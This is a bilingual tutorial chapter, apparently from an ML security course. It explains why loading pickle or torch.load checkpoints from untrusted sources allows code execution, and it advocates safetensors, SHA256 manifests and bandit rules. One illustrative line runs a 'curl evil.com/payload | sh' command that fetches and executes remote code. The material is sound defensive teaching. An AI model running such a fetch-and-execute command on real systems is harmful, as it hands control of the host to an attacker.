English · Español
02 — Supply chain: pickle, safetensors, MANIFEST.json¶
🇪🇸 La cadena de suministro es todo lo que cargamos desde disco — pesos del modelo, tokenizador, índices RAG.
picklees un intérprete Python serializado:torch.load(ruta_no_confiable)ejecuta código arbitrario por diseño. La alternativa essafetensors(solo datos, sin código) + unMANIFEST.jsoncon SHA256 por artefacto, verificado porscripts/verify_artifacts.shantes de cualquier carga.
What "supply chain" means for this system¶
Every persisted artifact loaded at runtime is part of the supply chain:
| Artifact | Path (per phases 11–32) | Risk class |
|---|---|---|
| Tokenizer (BPE merges + vocab) | artifacts/tokenizer/ |
Medium (JSON; integrity-only) |
| Model weights | artifacts/checkpoints/mini-gpt-grammar.{pt,safetensors} |
High (deserialization) |
| RAG embeddings index | artifacts/rag/index/ |
Medium (binary; integrity-only) |
| RAG knowledge-base chunks | data/kb/grammar-rules/chunks.jsonl |
Medium (JSON; content-integrity) |
| Hypothesis fuzz corpus | .hypothesis/ |
Low (test-time only) |
The "supply chain" is the answer to: if I trust nothing about who put these files on disk, what can go wrong?
Pickle: the worst-case load¶
Python's pickle module is not a data format; it's a serialized program. When you call pickle.load(f), the pickle VM walks a sequence of opcodes that can:
- Allocate objects.
- Call arbitrary callables (including
os.system,subprocess.run,eval). - Import arbitrary modules.
A pickle byte sequence that calls os.system("curl evil.com/payload | sh") during deserialization is trivial to construct. There is no flag to "load data only" — that's not what pickle does.
torch.load wraps pickle. So:
import torch
# Hostile checkpoint downloaded from a model hub:
state = torch.load("downloaded.pt") # ← arbitrary code executes here
model.load_state_dict(state) # ← reached only if RCE didn't drop a shell
The chance of RCE on torch.load(untrusted_path) is 100% if the file is hostile. Not "it depends on the model architecture." Not "if you have weird tensors." A hostile file is defined as one that runs code on load; the file format permits it; the loader honors it.
What "untrusted path" means¶
The path is untrusted if any of the following hold:
- The file was downloaded from a public hub (Hugging Face, Civitai, a random GitHub release).
- The file was emailed, dropped into a shared drive, or attached to a PR.
- The file is on a host another user can write to without your review.
- The file was downloaded a year ago; you don't remember verifying it.
Trust is a property of provenance and integrity, not of the act of having the file on disk.
Safetensors: data only, no code¶
safetensors is a format designed specifically to be safe to deserialize:
- The header is a JSON object: tensor name →
{dtype, shape, offsets}. - The body is raw bytes for each tensor, in the declared dtype/shape.
- The loader never instantiates Python objects beyond plain tensors.
There is no opcode, no callable, no import, no __reduce__. The loader reads bytes into a tensor. End of trust boundary.
from safetensors.torch import load_file
state = load_file("downloaded.safetensors") # just tensors, no code path to RCE
A hostile .safetensors file can still lie about its contents — wrong shape, wrong values, NaN-poisoned weights that degrade quality. That's an integrity attack, not an RCE. Caught downstream by:
- Shape checks at
load_state_dict. MANIFEST.jsonSHA256 verification (below).- Behavioral tests after load (Phase 20's harness will flag a degraded model).
Trade: safetensors gives up the convenience of "pickle anything Python can pickle" and gains a hard guarantee against RCE-on-load.
MANIFEST.json: integrity for everything else¶
Even with safetensors, you still need to know: is this file the one I expect, or was it swapped?
Phase 18 emits MANIFEST.json at the end of each training run:
{
"generated_at": "2026-05-22T14:31:08Z",
"git_sha": "a1b2c3d…",
"artifacts": [
{
"path": "artifacts/checkpoints/mini-gpt-grammar.safetensors",
"sha256": "8f2a…cc91",
"bytes": 4194304,
"role": "model-weights"
},
{
"path": "artifacts/tokenizer/vocab.json",
"sha256": "1d3c…0a87",
"bytes": 16384,
"role": "tokenizer-vocab"
},
{
"path": "data/kb/grammar-rules/chunks.jsonl",
"sha256": "4e7b…b21f",
"bytes": 102400,
"role": "rag-kb"
}
]
}
scripts/verify_artifacts.sh (Lab 04):
- Walks
artifacts[]. - For each entry: computes
sha256sum <path>. - Compares to the stored
sha256. - Exits 0 if all match. Exits non-zero with a clear message naming the mismatched file.
This catches:
- Bit rot on disk.
- An attacker swapping
chunks.jsonlfor a poisoned version. - A teammate accidentally overwriting weights with an older checkpoint.
It does not catch:
- An attacker who also rewrites
MANIFEST.json. (Mitigation: GPG-signMANIFEST.json, store the public key out-of-band. Phase 37's lab leaves signing as a stretch goal.) - Logic bugs in the artifacts. (Mitigation: behavioral tests, Phase 20.)
The manifest is a tripwire, not a fortress. But it's a cheap tripwire that catches the common cases (rot, accidental overwrite, naive tampering).
The threat in numbers¶
A quick sanity check, not a measurement:
- Probability that a random hub checkpoint is hostile: low but non-zero. Documented incidents exist (PoisonGPT, public bandit-scanner findings on HF in 2023–2024).
- Severity if a hostile checkpoint runs: 5/5 (full RCE on the host as the user running the load).
- Detection probability without tooling: ~0% (nothing visible during load).
- Detection probability with
MANIFEST.json+ safetensors-only policy: high for naive tampering, moderate for sophisticated tampering (the attacker would need to compromise both file and manifest and signing key if signed).
Residual risk after the policy: low for this single-user, local-only deployment. Higher for any multi-user deployment, which Phase 37 explicitly does not cover.
The enforcement: bandit + custom rule¶
The policy "no pickle-based loads in agent code" is enforced two ways:
banditrule B301 — flagspickle.loadand friends insrc/.- Custom rule — flags
torch.load(without an explicitweights_only=Trueargument. (Even withweights_only=True, prefer safetensors; the flag is a defense-in-depth, not the primary defense.)
just security runs both as part of CI. A new use of pickle requires a per-line # nosec with a justification comment, code review, and an entry in security/THREATS.md.
One-paragraph recap¶
The model-load path is the single highest-severity supply-chain risk in any ML system: torch.load on an untrusted pickle is RCE by design. The fix is two-layered: switch to safetensors (no code path to execute) and verify everything against MANIFEST.json SHA256 hashes (catch tampering and rot). Enforcement is via bandit + a custom rule, with scripts/verify_artifacts.sh as the runtime tripwire.
Next: theory/03-threat-modeling-numbers.md — the prob × severity × (1 − detection) matrix.